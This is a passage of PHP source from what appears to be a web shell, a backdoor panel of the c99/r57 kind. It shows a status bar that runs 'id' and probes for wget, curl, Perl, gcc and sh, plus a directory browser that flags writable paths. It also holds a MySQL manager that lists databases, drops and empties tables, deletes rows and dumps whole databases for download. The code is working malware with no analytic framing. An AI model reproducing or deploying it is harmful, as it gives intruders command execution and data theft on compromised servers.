echo "<table id=pagebar><tr><td width=50%><p>".
   "Software : ".$DISP_SERVER_SOFTWARE ." - <a href=".$surl."x=phpini>php.ini</a><br>".
   "$hsafemode<br>".
   "OS : ".php_uname()."<br>";
if (!$win) { echo "User ID : ".myshellexec("id"); }
else { echo "User : " . get_current_user(); }
echo "</p></td>".
   "<td width=50%><p>Server IP : <a href=http://www.ip-adress.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a> - ".
   "Your IP : <a href=http://www.ip-adress.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a><br>";
if($win){echo "Drives : ".disp_drives($d,$surl)."<br>";}
echo "Freespace : ".disp_freespace($d);
echo "</p></td></tr>";
echo "<tr><td colspan=2><p>";
echo "MySQL: ".testmysql()." cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()." gcc: ".testgcc()." SH: ".testSH()."<br>";
echo "Disabled Functions: ".showdisablefunctions();
echo "</p></td></tr>";
echo "<tr><td colspan=2 id=mainmenu>";
if (count($quicklaunch2) > 0) {
 foreach($quicklaunch2 as $item) {
  $item[1] = str_replace("%d",urlencode($d),$item[1]);
  $item[1] = str_replace("%sort",$sort,$item[1]);
  $v = realpath($d."..");
  if (empty($v)) {
   $a = explode(DIRECTORY_SEPARATOR,$d);
   unset($a[count($a)-2]);
   $v = join(DIRECTORY_SEPARATOR,$a);
  }
  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  echo "<a href=\"".$item[1]."\">".$item[0]."</a>
";
 }
}
echo "</td><tr><td colspan=2 id=mainmenu>";
if (count($quicklaunch1) > 0) {
 foreach($quicklaunch1 as $item) {
  $item[1] = str_replace("%d",urlencode($d),$item[1]);
  $item[1] = str_replace("%sort",$sort,$item[1]);
  $v = realpath($d."..");
  if (empty($v)) {
   $a = explode(DIRECTORY_SEPARATOR,$d);
   unset($a[count($a)-2]);
   $v = join(DIRECTORY_SEPARATOR,$a);
  }
  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  echo "<a href=\"".$item[1]."\">".$item[0]."</a>
";
 }
}
echo "</td></tr><tr><td colspan=2>";
echo "<p class=fleft>";
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b) {
 $t = ""; $j = 0;
 foreach ($e as $r) {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) { break; }
  $j++;
 }
 echo "<a href=\"".$surl."x=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=white>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>";
 $i++;
}
echo " - ";
if (is_writable($d)) {
 $wd = TRUE;
 $wdt = "<font color=#00FF00>[OK]</font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font>";
}
else {
 $wd = FALSE;
 $wdt = "<font color=red>[Read-Only]</font>";
 echo "<b>".view_perms_color($d)."</b>";
}
?>
</p>
<div class=fright>
<form method="POST"><input type=hidden name=act value="ls">
Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
</form>
</div>
</td></tr></table>
<?php
echo "<table id=maininfo><tr><td width=\"100%\">
";
if ($x == "") { $x = $dspact = "ls"; }
if ($x == "phpini" ) { get_phpini(); }
if ($x == "sql") {
 $sql_surl = $surl."x=sql";
 if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
 if ($sql_port)  {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
 if ($sql_db)   {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
 $sql_surl .= "&";
 echo "<table>".
    "<tr><td width=\"100%\" colspan=2 class=barheader>";
 if ($sql_server) {
  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  $err = mysql_smarterror();
  @mysql_select_db($sql_db,$sql_sock);
  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
 }
 else {$sql_sock = FALSE;}
 echo ".: SQL Manager :.<br>";
 if (!$sql_sock) {
  if (!$sql_server) {echo "NO CONNECTION";}
  else {echo "Can't connect! ".$err;}
 }
 else {
  $sqlquicklaunch = array();
  $sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  $sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
  $sqlquicklaunch[] = array("Server-status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
  $sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
  $sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
  $sqlquicklaunch[] = array("Logout",$surl."x=sql");
  echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
 }
 echo "</td></tr><tr>";
 if (!$sql_sock) {
  echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
  echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"x\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
 }
 else {
  if (!empty($sql_db)) {
   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
   <?php
   $result = mysql_list_tables($sql_db);
   if (!$result) {echo mysql_smarterror();}
   else {
    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
    $c = 0;
    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
    if (!$c) {echo "No tables found in database.";}
   }
  }
  else {
   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
   <?php
   $result = mysql_list_dbs($sql_sock);
   if (!$result) {echo mysql_smarterror();}
   else {
    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
    <?php
    $c = 0;
    $dbs = "";
    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
    echo "<option value=\"\">Databases (".$c.")</option>";
    echo $dbs;
   }
   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
   <?php
  }
  echo "</td><td width=\"100%\">";
  $diplay = TRUE;
  if ($sql_db) {
   if (!is_numeric($c)) {$c = 0;}
   if ($c == 0) {$c = "no";}
   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
   echo "</b></center>";
   $acts = array("","dump");
   if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "
`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
   elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` 
";} $sql_x = "query";}
   elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
   elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "
`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
   elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "
`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
   elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "
`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
   elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "
`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
   elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;
";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
   elseif ($sql_tbl_x == "insert") {
    if ($sql_tbl_insert_radio == 1) {
     $keys = "";
     $akeys = array_keys($sql_tbl_insert);
     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
     $values = "";
     $i = 0;
     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
     $sql_x = "query";
     $sql_tbl_x = "browse";
    }
    elseif ($sql_tbl_insert_radio == 2) {
     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
     $result = mysql_query($sql_query) or print(mysql_smarterror());
     $result = mysql_fetch_array($result, MYSQL_ASSOC);
     $sql_x = "query";
     $sql_tbl_x = "browse";
    }
   }
   if ($sql_x == "query") {
    echo "<hr size=\"1\" noshade>";
    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
    if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
    if ((!$submit) or ($sql_x)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
   }
   if (in_array($sql_x,$acts)) {
    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
    <form action="<?php echo $surl; ?>">
    <input type="hidden" name="x" value="sql">
    <input type="hidden" name="sql_x" value="newtbl">
    <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
    <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
    <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
    <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
    <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
    <input type="text" name="sql_newtbl" size="20">
    <input type="submit" value="Create">
    </form></td>
    <td width="30%" height="1"><b>Dump DB:</b>
    <form action="<?php echo $surl; ?>">
    <input type="hidden" name="x" value="sql">
    <input type="hidden" name="sql_x" value="dump">
    <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
    <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
    <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
    <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
    <?php
    if (!empty($sql_x)) {echo "<hr size=\"1\" noshade>";}
    if ($sql_x == "newtbl") {
     echo "<b>";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
      echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
     }
     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
    }
    elseif ($sql_x == "dump") {
     if (empty($submit)) {
      $diplay = FALSE;
      echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
      echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
      $v = join (";",$dmptbls);
      echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
      if ($dump_file) {$tmp = $dump_file;}
      else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
      echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
      echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
      echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
      echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
      echo "</form>";
     }
     else {
      $diplay = TRUE;
      $set = array();
      $set["sock"] = $sql_sock;
      $set["db"] = $sql_db;
      $dump_out = "download";
      $set["print"] = 0;
      $set["nl2br"] = 0;
      $set[""] = 0;
      $set["file"] = $dump_file;
      $set["add_drop"] = TRUE;
      $set["onlytabs"] = array();
      if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
      $ret = mysql_dump($set);
      if ($sql_dump_download) {
       @ob_clean();
       header("Content-type: application/octet-stream");
       header("Content-length: ".strlen($ret));
       header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
       echo $ret;
       exit;
      }
      elseif ($sql_dump_savetofile) {
       $fp = fopen($sql_dump_file,"w");
       if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
       else {
        fwrite($fp,$ret);
        fclose($fp);
        echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
       }
      }
      else {echo "<b>Dump: nothing to do!</b>";}
     }
    }
    if ($diplay) {
  if (!empty($sql_tbl)) {
   if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";}
   $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
   $count_row = mysql_fetch_array($count);
   mysql_free_result($count);
   $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
   $tbl_struct_fields = array();
   while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
   if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
   if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
   if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
   if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
   $perpage = $sql_tbl_le - $sql_tbl_ls;
   if (!is_numeric($perpage)) {$perpage = 10;}
   $numpages = $count_row[0]/$perpage;
   $e = explode(" ",$sql_order);
   if (count($e) == 2) {
    if ($e[0] == "d") {$asc_desc = "DESC";}
    else {$asc_desc = "ASC";}
    $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
   }
   else {$v = "";}
   $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
   $result = mysql_query($query) or print(mysql_smarterror());
   echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
   echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
   echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
   echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
   echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
   if ($sql_tbl_x == "structure") {echo "<br><br><b>Coming sooon!</b>";}
   if ($sql_tbl_x == "insert") {
    if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
    if (!empty($sql_tbl_insert_radio)) { } //Not Ready
    else {
     echo "<br><br><b>Inserting row into table:</b><br>";
     if (!empty($sql_tbl_insert_q)) {
      $sql_query = "SELECT * FROM `".$sql_tbl."`";
      $sql_query .= " WHERE".$sql_tbl_insert_q;
      $sql_query .= " LIMIT 1;";
      $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
      $values = mysql_fetch_assoc($result);
      mysql_free_result($result);
     }
     else {$values = array();}
     echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
     foreach ($tbl_struct_fields as $field) {
      $name = $field["Field"];
      if (empty($sql_tbl_insert_q)) {$v = "";}
      echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
      $i++;
     }
     echo "</table><br>";
     echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
     if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
     echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
    }
   }
   if ($sql_tbl_x == "browse") {
    $sql_tbl_ls = abs($sql_tbl_ls);
    $sql_tbl_le = abs($sql_tbl_le);
    echo "<hr size=\"1\" noshade>";
    echo "<img src=\"".$surl."x=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
    $b = 0;
    for($i=0;$i<$numpages;$i++) {
     if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
     echo $i;
     if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
     if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
     else {echo "&nbsp;";}
    }
    if ($i == 0) {echo "empty";}
    echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
    echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
    echo "<tr>";
    echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
    for ($i=0;$i<mysql_num_fields($result);$i++) {
     $v = mysql_field_name($result,$i);
     if ($e[0] == "a") {$s = "d"; $m = "asc";}
     else {$s = "a"; $m = "desc";}
     echo "<td>";
     if (empty($e[0])) {$e[0] = "a";}
     if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
     else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
     echo "</td>";
    }
   echo "<td><font color=\"green\"><b>Action</b></font></td>";
   echo "</tr>";
   while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
    echo "<tr>";
    $w = "";
    $i = 0;
    foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
    if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
    echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
    $i = 0;
    foreach ($row as $k=>$v)
    {
    $v = htmlspecialchars($v);
    if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
    echo "<td>".$v."</td>";
    $i++;
    }
    echo "<td>";
    echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."x=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
    echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."x=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
    echo "</td>";
    echo "</tr>";
   }
   mysql_free_result($result);
   echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_x\">";
   echo "<option value=\"\">With selected:</option>";
   echo "<option value=\"deleterow\">Delete</option>";
   echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
   }
  }
  else {
   $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
   if (!$result) {echo mysql_smarterror();}
   else
   {
   echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
   $i = 0;
   $tsize = $trows = 0;
   while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
   {
    $tsize += $row["Data_length"];
    $trows += $row["Rows"];
    $size = view_size($row["Data_length"]);
    echo "<tr>";
    echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
    echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
    echo "<td>".$row["Rows"]."</td>";
    echo "<td>".$row["Type"]."</td>";
    echo "<td>".$row["Create_time"]."</td>";
    echo "<td>".$row["Update_time"]."</td>";
    echo "<td>".$size."</td>";
